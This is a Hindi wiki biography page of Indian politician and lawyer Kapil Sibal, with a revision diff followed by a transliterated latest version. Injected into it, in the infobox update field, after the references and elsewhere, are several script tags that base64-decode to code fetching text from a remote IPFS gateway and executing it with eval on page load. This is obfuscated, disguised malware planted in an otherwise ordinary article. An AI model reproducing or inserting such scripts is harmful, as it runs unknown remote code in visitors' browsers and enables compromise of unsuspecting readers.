Difference between revisions of "कपिल सिब्बल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:राज्यसभा सांसद (को हटा दिया गया हैं।))
 
(6 intermediate revisions by 3 users not shown)
Line 5: Line 5:
 
|जन्म=[[8 अगस्त]], [[1948]]  
 
|जन्म=[[8 अगस्त]], [[1948]]  
 
|जन्म भूमि=[[जालंधर]], [[पंजाब]]
 
|जन्म भूमि=[[जालंधर]], [[पंजाब]]
|अविभावक=हीरा लाल सिब्बल, कैलाश रानी सिब्बल
+
|अभिभावक=[[पिता]]- हीरा लाल सिब्बल, [[माता]]- कैलाश रानी सिब्बल
 
|पति/पत्नी=नीना सिब्बल
 
|पति/पत्नी=नीना सिब्बल
 
|संतान=दो पुत्र- अमित और अखिल
 
|संतान=दो पुत्र- अमित और अखिल
Line 33: Line 33:
 
|अद्यतन={{अद्यतन|17:22, 23 मई 2014 (IST)}}
 
|अद्यतन={{अद्यतन|17:22, 23 मई 2014 (IST)}}
 
}}
 
}}
'''कपिल सिब्बल''' ([[अंग्रेज़ी]]:''Kapil Sibal'') एक भारतीय राजनीतिज्ञ, वकील हैं जो [[मनमोहन सिंह]] के प्रधानमन्त्री कार्यकाल के दौरान कैबिनेट मंत्रिमंडल में संचार एवं सूचना प्रौद्योगिकी मंत्री रहे। इससे पहले कपिल सिब्बल मानव संसाधन मंत्री भी रह चुके हैं।
+
'''कपिल सिब्बल''' ([[अंग्रेज़ी]]: ''Kapil Sibal'') जानेमाने भारतीय राजनीतिज्ञ और वकील हैं, जो [[मनमोहन सिंह]] के [[प्रधानमन्त्री]] कार्यकाल के दौरान कैबिनेट मंत्रिमंडल में संचार एवं सूचना प्रौद्योगिकी मंत्री रहे। इससे पहले कपिल सिब्बल मानव संसाधन मंत्री भी रह चुके हैं।
 
==जीवन परिचय==
 
==जीवन परिचय==
कपिल सिब्बल का जन्म [[8 अगस्त]], [[1948]] [[जालंधर]], [[पंजाब]] में हुआ। इनके पिताजी नाम श्री '''हीरा लाल सिब्बल''' और माताजी श्रीमती '''कैलाश रानी सिब्बल''' है। कपिल सिब्बल के पिताजी हीरा लाल सिब्बल एक प्रसिद्ध वकील थे जिन्हें सन् 2006 में [[पद्म भूषण]] से सम्मानित किया गया। कपिल सिब्बल [[1964]] में दिल्ली चले गए और सेंट स्टीफंस कॉलेज से इतिहास में एम.ए, [[दिल्ली विश्वविद्यालय]] से एल.एल.बी. और [[1977]] में हार्वर्ड लॉ स्कूल से एल.एल.एम. उत्तीर्ण की। कपिल सिब्बल ने सन् [[13 अप्रॅल]], [[1973]] में '''नीना सिब्बल''' से विवाह किया। उनके दो पुत्र '''अमित''' और '''अखिल''' हैं जिन्होंने कैम्ब्रिज विश्वविद्यालय में अध्ययन किया है, और प्रतिष्ठित हार्वर्ड और स्टैनफोर्ड विश्वविद्यालय से डिग्री प्राप्त कर [[भारत]] में वकालत की प्रेक्टिस कर रहे हैं।<ref>{{cite web |url=http://people.maxabout.com/profile/kapil-sibal/100006 |title=People maxabout |accessmonthday=25 सितंबर |accessyear=2010 |last= |first= |authorlink= |format=एचटीएम |publisher= |language=[[अंग्रेज़ी भाषा|अंग्रेज़ी]] }}</ref>
+
कपिल सिब्बल का जन्म [[8 अगस्त]], [[1948]] [[जालंधर]], [[पंजाब]] में हुआ। इनके [[पिता]] श्री हीरा लाल सिब्बल और [[माता]] श्रीमती कैलाश रानी सिब्बल हैं। कपिल सिब्बल के पिता हीरा लाल सिब्बल एक प्रसिद्ध वकील थे, जिन्हें सन् [[2006]] में [[पद्म भूषण]] से सम्मानित किया गया था। कपिल सिब्बल [[1964]] में [[दिल्ली]] चले आये और सेंट स्टीफंस कॉलेज से [[इतिहास]] में एम.ए, [[दिल्ली विश्वविद्यालय]] से एल.एल.बी. और [[1977]] में हार्वर्ड लॉ स्कूल से एल.एल.एम. उत्तीर्ण की। उन्होंने सन् [[13 अप्रॅल]], [[1973]] में नीना सिब्बल से [[विवाह]] किया। उनके दो पुत्र अमित और अखिल हैं, जिन्होंने कैम्ब्रिज विश्वविद्यालय में अध्ययन किया है और प्रतिष्ठित हार्वर्ड और स्टैनफोर्ड विश्वविद्यालय से डिग्री प्राप्त कर [[भारत]] में वकालत की प्रेक्टिस कर रहे हैं।<ref>{{cite web |url=http://people.maxabout.com/profile/kapil-sibal/100006 |title=People maxabout |accessmonthday=25 सितंबर |accessyear=2010 |last= |first= |authorlink= |format=एचटीएम |publisher= |language=[[अंग्रेज़ी भाषा|अंग्रेज़ी]] }}</ref> [[2005]] में कपिल सिब्बल ने एक सामाजिक कार्यकर्ता प्रोमिला से पुन: शादी की। 
 
==व्यक्तित्व परिचय==
 
==व्यक्तित्व परिचय==
 
कपिल सिब्बल देश के सबसे महंगे वकीलों में से तो हैं ही, बल्कि वे कविताएं भी लिखते हैं। वे शायद दुनिया के अकेले ऐसे कवि होंगे जो अपने ब्लैकबेरी मोबाइल पर कविताएँ लिखते हैं। उनका एक कविता संकलन छप चुका है और उसमें एक कविता है-  
 
कपिल सिब्बल देश के सबसे महंगे वकीलों में से तो हैं ही, बल्कि वे कविताएं भी लिखते हैं। वे शायद दुनिया के अकेले ऐसे कवि होंगे जो अपने ब्लैकबेरी मोबाइल पर कविताएँ लिखते हैं। उनका एक कविता संकलन छप चुका है और उसमें एक कविता है-  
Line 42: Line 42:
 
तुम तो मुझे इरेज कर दोगे।</poem>  
 
तुम तो मुझे इरेज कर दोगे।</poem>  
 
कम लोगों को पता है कि कपिल सिब्बल तकनीकी विकास के मंत्री होने के नाते एक शोध दल के साथ दक्षिणी ध्रुव और अंटार्टिका तक जा चुके हैं और शून्य से चालीस डिग्री नीचे के तापमान में हफ्तों रह चुके हैं। इस वैज्ञानिक दल का नेतृत्व भी उन्होंने किया था। वैसे वे [[2005]] और [[2009]] में विश्व आर्थिक फोरम डाबोस, स्विटजरलैंड भी जा चुके हैं और [[अमेरिका]] जा कर इज़राइल और फिलिस्तीन के बीच बाकायदा दोस्ती और बाइज्जत दोस्ती की बात भी कर चुके हैं। <ref>{{cite web |url=http://www.janadesh.in/innerpage.aspx?Story_ID=605%20&Parent_ID=3 |title=जनादेश |accessmonthday=25 सितंबर |accessyear=2010 |last= |first= |authorlink= |format=ए.एस.पी.एक्स |publisher= |language=[[हिन्दी]] }}</ref>
 
कम लोगों को पता है कि कपिल सिब्बल तकनीकी विकास के मंत्री होने के नाते एक शोध दल के साथ दक्षिणी ध्रुव और अंटार्टिका तक जा चुके हैं और शून्य से चालीस डिग्री नीचे के तापमान में हफ्तों रह चुके हैं। इस वैज्ञानिक दल का नेतृत्व भी उन्होंने किया था। वैसे वे [[2005]] और [[2009]] में विश्व आर्थिक फोरम डाबोस, स्विटजरलैंड भी जा चुके हैं और [[अमेरिका]] जा कर इज़राइल और फिलिस्तीन के बीच बाकायदा दोस्ती और बाइज्जत दोस्ती की बात भी कर चुके हैं। <ref>{{cite web |url=http://www.janadesh.in/innerpage.aspx?Story_ID=605%20&Parent_ID=3 |title=जनादेश |accessmonthday=25 सितंबर |accessyear=2010 |last= |first= |authorlink= |format=ए.एस.पी.एक्स |publisher= |language=[[हिन्दी]] }}</ref>
 
 
==राजनीतिक जीवन==
 
==राजनीतिक जीवन==
 
कपिल सिब्बल पहली बार [[1998]] में [[राज्यसभा]] के जरिए राजनीति में आए थे। [[दिल्ली]] के [[चाँदनी चौक]] लोकसभा क्षेत्र से सांसद रह चुके हैं। वे हमेशा चांदनी चौक जैसे पुराने इलाके से चुनाव लड़ते हैं, जबकि उन्हें दक्षिण दिल्ली के अभिजात मतदाताओं का उम्मीदवार होना चाहिए।  
 
कपिल सिब्बल पहली बार [[1998]] में [[राज्यसभा]] के जरिए राजनीति में आए थे। [[दिल्ली]] के [[चाँदनी चौक]] लोकसभा क्षेत्र से सांसद रह चुके हैं। वे हमेशा चांदनी चौक जैसे पुराने इलाके से चुनाव लड़ते हैं, जबकि उन्हें दक्षिण दिल्ली के अभिजात मतदाताओं का उम्मीदवार होना चाहिए।  
Line 54: Line 53:
 
*[http://eduployment.blogspot.com/2010/09/blog-post_3233.html कपिल सिब्बल के शिक्षा संबंधी सुधार]
 
*[http://eduployment.blogspot.com/2010/09/blog-post_3233.html कपिल सिब्बल के शिक्षा संबंधी सुधार]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{पंद्रहवीं लोकसभा सांसद}}
+
{{भारतीय राष्ट्रीय काँग्रेस}}
 
[[Category:राजनीतिज्ञ]]
 
[[Category:राजनीतिज्ञ]]
 
[[Category:केंद्रीय मंत्रिपरिषद]]
 
[[Category:केंद्रीय मंत्रिपरिषद]]
 
[[Category:कैबिनेट मंत्री]]
 
[[Category:कैबिनेट मंत्री]]
[[Category:चुनाव अद्यतन]]
+
[[Category:राजनीति कोश]]
[[Category:राज्यसभा सांसद]]
+
[[Category:राज्यसभा सांसद]][[Category:लोकसभा सांसद]][[Category:दिल्ली के लोकसभा सांसद]][[Category:दिल्ली के राज्य सभा सांसद]]
 +
[[Category:भारतीय राष्ट्रीय काँग्रेस]]
 +
[[Category:भारत के मानव संसाधन विकास मंत्री]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 06:11, 8 August 2018

kapil sibbal
poora nam kapil sibbal
janm 8 agast, 1948
janm bhoomi jalandhar, panjab
abhibhavak pita- hira lal sibbal, mata- kailash rani sibbal
pati/patni nina sibbal
santan do putr- amit aur akhil
nagarikata bharatiy
parti bharatiy rashtriy kaangres
pad poorv kaibinet mantri (sanchar evan soochana praudyogiki), poorv manav sansadhan vikas mantri, poorv vijnan aur takaniki mantri
shiksha em.e. (itihas), elel. bi., el. el. em.
vidyalay seant stiphans k aaulej, dilli vishvavidyalay aur harvard l aau skool
bhasha hindi, aangrezi
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kapil sibbal (aangrezi: Kapil Sibal) janemane bharatiy rajanitijn aur vakil haian, jo manamohan sianh ke pradhanamantri karyakal ke dauran kaibinet mantrimandal mean sanchar evan soochana praudyogiki mantri rahe. isase pahale kapil sibbal manav sansadhan mantri bhi rah chuke haian.

jivan parichay

kapil sibbal ka janm 8 agast, 1948 jalandhar, panjab mean hua. inake pita shri hira lal sibbal aur mata shrimati kailash rani sibbal haian. kapil sibbal ke pita hira lal sibbal ek prasiddh vakil the, jinhean sanh 2006 mean padm bhooshan se sammanit kiya gaya tha. kapil sibbal 1964 mean dilli chale aye aur seant stiphans k aaulej se itihas mean em.e, dilli vishvavidyalay se el.el.bi. aur 1977 mean harvard l aau skool se el.el.em. uttirn ki. unhoanne sanh 13 aprॅl, 1973 mean nina sibbal se vivah kiya. unake do putr amit aur akhil haian, jinhoanne kaimbrij vishvavidyalay mean adhyayan kiya hai aur pratishthit harvard aur stainaphord vishvavidyalay se digri prapt kar bharat mean vakalat ki prektis kar rahe haian.[1] 2005 mean kapil sibbal ne ek samajik karyakarta promila se pun: shadi ki.

vyaktitv parichay

kapil sibbal desh ke sabase mahange vakiloan mean se to haian hi, balki ve kavitaean bhi likhate haian. ve shayad duniya ke akele aise kavi hoange jo apane blaikaberi mobail par kavitaean likhate haian. unaka ek kavita sankalan chhap chuka hai aur usamean ek kavita hai-

mujhe prem ka esemes mat bhejana
kyoanki maian jaldi mitana nahian chahata
tum to mujhe irej kar doge.

kam logoan ko pata hai ki kapil sibbal takaniki vikas ke mantri hone ke nate ek shodh dal ke sath dakshini dhruv aur aantartika tak ja chuke haian aur shoony se chalis digri niche ke tapaman mean haphtoan rah chuke haian. is vaijnanik dal ka netritv bhi unhoanne kiya tha. vaise ve 2005 aur 2009 mean vishv arthik phoram dabos, svitajaralaiand bhi ja chuke haian aur amerika ja kar izarail aur philistin ke bich bakayada dosti aur baijjat dosti ki bat bhi kar chuke haian. [2]

rajanitik jivan

kapil sibbal pahali bar 1998 mean rajyasabha ke jarie rajaniti mean ae the. dilli ke chaandani chauk lokasabha kshetr se saansad rah chuke haian. ve hamesha chaandani chauk jaise purane ilake se chunav l date haian, jabaki unhean dakshin dilli ke abhijat matadataoan ka ummidavar hona chahie.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. People maxabout (aangrezi) (echatiem). . abhigaman tithi: 25 sitanbar, 2010.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. janadesh (hindi) (e.es.pi.eks). . abhigaman tithi: 25 sitanbar, 2010.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>